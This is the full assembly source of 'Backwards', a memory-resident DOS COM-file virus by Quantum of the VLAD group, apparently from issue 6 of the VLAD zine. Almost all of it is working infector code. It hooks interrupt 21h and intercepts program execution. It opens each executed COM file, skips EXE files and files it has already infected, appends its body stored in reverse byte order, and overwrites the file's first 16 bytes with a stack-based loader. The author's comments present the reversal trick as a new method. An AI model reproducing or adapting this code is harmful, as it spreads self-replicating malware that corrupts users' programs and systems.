;
; Backwards by Quantum / VLAD.
;
; w00p.. this is a standard TSR com infector. Now before you start
; screaming that I should go code for YAM with shit like this, I would
; like to point out that this virus uses a unique infection method that
; reverses the code.
;
; By pushing everything onto the stack, it reverses the code, that is stored
; backwards, and executes it. The loader is 16 bytes long and the original
; 16 bytes of the file are stored in the virus code.
;
mov si,offset c
xor sp,sp
mov cx,(offset cend - offset c)/2
loop1:
lodsw
xchg ah,al
push ax
loop loop1
jmp sp
; rest of the host goes here
int 20h
; virus code goes here .. note: this code is stored backwards!
; I suggest you go to the end of the code and read backwards.
c:
db 16 dup (90h) ; will always be at FFF0h
org16bytes:
db 0e4h,0ffh ; jmp sp
db $ - offset loaderloop
db 0e2h ; loop loaderloop
db 50h ; push ax
db 0e0, 86h ; xchg ah,al
db 0adh ; lodsw
loaderloop:
db ((offset cend - offset c)/2)/256
db ((offset cend - offset c)/2) and 255
db 0b9h ; mov cx,(offset cend - offset c)/2
db 0e4h,31h ; xor sp,sp
db 0,0
wherecodeat:
db 0beh ; mov si,where the code is at
loader:
db "BACKWARDS by Quantum / VLAD"
db $ - offset goold
db 0ebh ; jmp goold
db 58h ; pop ax
db 5bh ; pop bx
db 59h ; pop cx
db 5ah ; pop dx
db 5eh ; pop si
db 5fh ; pop di
db 1fh ; pop ds
db 07h ; pop es
db 21h, 0cdh ; int 21h
db 3eh, 0b4h ; mov ah,3eh
closefile:
db 21h, 0cdh ; int 21h
db (offset cend - offset loader)/ 256
db (offset cend - offset loader) and 255
db 0bah ; mov dx,(offset cend - offset loader)
db 1fh ; pop ds
db 0eh ; push cs
db 0, 10h, 0b9h ; mov cx,16
db 40h, 0b4h ; mov ah,40h
db 21h, 0cdh ; int 21h
db 0d2h, 031h ; xor dx,dx
db 0c9h, 031h ; xor cx,cx
db 42h,0, 0b8h ; mov ax,4200h
db 21h, 0cdh ; int 21h
db (offset cend - offset c) / 256
db (offset cend - offset c) and 255
db 0b9h ; mov cx,(offset cend - offset c)
db 40h, 0b4h ; mov ah,40h
db 0fah
db 0e2h ; loop
db 0aah ; stosb
db 0fdh ; std
db 0ach ; lodsb
db 0fch ; cld
db 0ffh,0ffh,0beh ; mov si,-1
db 0cah, 89h ; mov dx,cx
db (offset cend - offset c)/256
db (offset cend - offset c) and 255
db 0b9h ; mov cx,(offset cend - offset c)
db ((offset cend - offset c)*2)/256
db ((offset cend - offset c)*2) and 255
db 0bfh ; mov di,(offset cend - offset c)*2-1
db (offset cend - offset wherecodeat)/256
db (offset cend - offset wherecodeat) and 255
db 0a3h ; mov [offset cend - offset wherecodeat],ax
db 01h,0,5h ; add ax,0100h
db 21h, 0cdh ; int 21h
db 0d2h, 031h ; xor dx,dx
db 0c9h, 031h ; xor cx,cx
db 42h, 02h, 0b8h ; mov ax,4202h
db $ - offset closefile
db 74h ; jz closefile
db 0beh
db (offset cend - offset org16bytes) / 256
db (offset cend - offset org16bytes) and 255
db 3eh, 80h ; cmp byte ptr [offset cend - offset org14bytes],0beh
db $ - offset closefile
db 74h ; jz closefile
db "M","Z"
db (offset cend - offset org16bytes) / 256
db (offset cend - offset org16bytes) and 255
db 3eh, 81h ; cmp word ptr [offset cend - offset org16bytes],"ZM"
db 21h , 0cdh ; int 21h
db (offset cend - offset org16bytes)/256
db (offset cend - offset org16bytes) and 255
db 0bah ; mov dx,offset cend - offset org16bytes
db 0, 10h, 0b9h ; mov cx,16
db 3fh, 0b4h ; mov ah,3fh
db 07h ; pop es
db 1fh ; pop ds
db 0eh ; push cs
db 0eh ; push cs
db 93h ; xchg bx,ax
db 21h, 0cdh ; int 21h
db 3dh,02h,0b8h ; mov ax,3d02h
db 06h ; push es
db 1eh ; push ds
db 57h ; push di
db 56h ; push si
db 52h ; push dx
db 51h ; push cx
db 53h ; push bx
db 50h ; push ax
executing:
db 0,0,0,0
oldi21:
db 0eah
goold:
db 5 ; $ - offset executing
db 74h ; jz executing
db 4bh,0fch,80h ; cmp ah,4bh
notserv:
db 0cfh ; iret
db $ - offset notserv
db 75h ; jnz notserv
db 18h,18h,03dh ; cmp ax,1818h
newi21:
db 0e7h, 0ffh ; jmp di
db (offset cend - offset c)/256
db (offset cend - offset c) and 255
db 0c4h, 81h ; add sp,(offset cend - offset c)
db 5fh ; pop di
db 0a5h, 0f3h ; rep movsw
db 0, 8, 0b9h ; mov cx,8
db 57h ; push di
db 1, 0, 0bfh ; mov di,0100h
db 0ffh, 0f0h, 0beh ; mov si,0fff0h
db 07h ; pop es
db 1fh ; pop ds
db 0eh ; push cs
db 0eh ; push cs
back2host:
db 0feh, 44h, 8ch ; mov word ptr [si-2],es
db (offset cend-offset newi21)/256
db (offset cend-offset newi21) and 255
db 0fch, 44h, 0c7h ; mov word ptr [si-4],offset cend-offset newi21
db 0a5h ; movsw
db 0a5h ; movsw
db (offset cend - offset oldi21)/256
db (offset cend - offset oldi21) and 255
db 0bfh ; mov di,offset cend - offset oldi21
db 0, 84h, 0beh ; mov si,84h
db 0d9h, 8eh ; mov ds,cx
db 0a5h, 0f3h ; rep movsw
db (0 - (offset cend - offset c))/256
db (0 - (offset cend - offset c)) and 255
db 0beh ; mov si,0 - (offset cend - offset c)
db ((offset cend - offset c)/2+1)/256
db ((offset cend - offset c)/2+1) and 255
db 0b9h ; mov cx,(offset cend - offset c)/2+1
db 1fh ; pop ds
db 0eh ; push cs
db 0c0h, 08eh ; mov es,ax
db 012h, 45h, 08bh ; mov ax,[di+12h]
db ((offset cend - offset c)/8+1)/256
db ((offset cend - offset c)/8+1) and 255
db 12h, 6dh, 81h ; sub word ptr [di+12h],(offset cend-offset c)/16+1
db ((offset cend - offset c)/8+1)/256
db ((offset cend - offset c)/8+1) and 255
db 3h, 6dh, 81h ; sub word ptr [di+3h],(offset cend-offset c)/16+1
db $ - offset back2host
db 75h ; jnz back2host
db "Z",03dh,80h ; cmp byte ptr [di],"Z"
db 0ffh, 031h ; xor di,di
db 0d8h, 8eh ; mov ds,ax
db 48h ; dec ax
db 0c0h,8ch ; mov ax,es
db $ - offset back2host
db 75h ; jnz back2host
db 0c0h,08h ; or al,al
db 21h,0cdh ; int 21h
db 18h,18h,0b8h ; mov ax,1818h
cend:
- VLAD #6 INDEX -